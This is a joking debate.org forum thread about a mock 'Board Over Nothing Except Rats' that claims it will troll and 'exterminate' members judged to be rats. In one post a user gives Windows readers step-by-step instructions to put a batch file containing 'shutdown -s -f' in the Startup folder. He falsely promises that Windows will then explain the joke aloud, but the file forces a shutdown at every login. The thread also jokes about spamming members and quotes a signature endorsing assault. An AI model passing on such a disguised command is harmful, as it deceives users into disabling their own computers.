Jump to topic:

Board Over Nothing Except Rats

wjmelements
Add as Friend
Challenge to a Debate
Send a Message
11/7/2010 8:11:25 PM
Posted: 6 years ago
I am pleased to inform the members of this debate community that I have established a new organization known as the Board Over Nothing Except Rats, or the .

The main purpose of my organization is to oversee this site's growing rat population.

Simply, I plan to identify which members are humans and which are rodents.

I have criteria in which I determine if a member is either "human" or "rat." If the member is credited as "human," I will neither interfere nor restrain that member from participating in debate. However, if I credit the member as "rat," I will spam the member and troll for a week. This would essentially chase away the member and keep debate.org "clean."

Now, many of you may think that this power is too grand. However, I must explain myself a little more. In this organization, a relatively brief report shall be written up that requests other members of the to look at a specified member to determine whether or not they should be "exterminated." After the decision is made, I will personally draft my reasoning as to why or why not the organization felt the need to keep/kill the member.

It will be quite professionally handled. Also, I will make sure to be fairly generous in my ruling. I will take the time (including the opinions of the members) to determine the humanity of members. I may even PM the maker of the account and question to find out his/her species.

I encourage anyone to PM me for more details about my organization. If you would like to become a member or office holder of the , please do so either in the thread or in a PM, and we can get started.

Thank you.
in the blink of an eye you finally see the light
wjmelements
Add as Friend
Challenge to a Debate
Send a Message
11/7/2010 8:15:53 PM
At 11/7/2010 8:14:23 PM, FREEDO wrote:
I am a zebra.

I'm going to politely ask you to leave. This is your first and final warning before we tranquilize you and return you to your natural habitat.
m93samman
Add as Friend
Challenge to a Debate
Send a Message
11/7/2010 8:17:45 PM
I am a website.
: At 4/15/2011 5:29:37 PM, CosmicAlfonzo wrote:
: Pascal's wager is for poosies.
:
: I mean that sincerly, because it's basically an argument from poooosie.
:
: I'm pretty sure that's like a fallacy.. Argument ad Pussium or something like that.
wjmelements
Add as Friend
Challenge to a Debate
Send a Message
11/7/2010 8:26:31 PM
Two accounts exterminated so far. This is probably the most successful Board created today.
SuperRobotWars
Add as Friend
Challenge to a Debate
Send a Message
11/8/2010 3:47:24 AM
A-BDA . . . q?
Minister Of Trolling
: At 12/6/2011 2:21:41 PM, badger wrote:
: ugly people should beat beautiful people ugly. simple! you'd be killing two birds with the one stone... women like violent men and you're making yourself more attractive, relatively. i met a blonde dude who was prettier than me not so long ago. he's not so pretty now! ha!
:
: ...and well, he wasn't really prettier than me. he just had nice hair.
wjmelements
Add as Friend
Challenge to a Debate
Send a Message
11/8/2010 8:28:17 PM
If you don't get this and you use Windows, do the following.

1. Open Notepad
2. Type the following:
shutdown -s -f
3. Save As...
4. File Name: a.bat
5. File Type: All Files
6. Save to C:\Documents and Settings\All Users\Start Menu\Programs\Startup
7. Restart your computer.

The next time you log on, Windows will explain this joke for you using Microsoft Sam's voice. It's the coolest thing you will ever hear.
wjmelements
Add as Friend
Challenge to a Debate
Send a Message
11/9/2010 2:35:49 PM
At 11/8/2010 9:03:40 PM, SportsGuru wrote:
What if you suspect someone to be a mouse?

File a separate report.
Marauder
Add as Friend
Challenge to a Debate
Send a Message
11/10/2010 10:23:51 AM
At 11/7/2010 8:28:41 PM, studentathletechristian8 wrote:
Why did you copy my outline?

It's possible he is mocking you
One act of Rebellion created all the darkness and evil in the world; One life of Total Obedience created a path back to eternity and God.

A Scout is Obedient.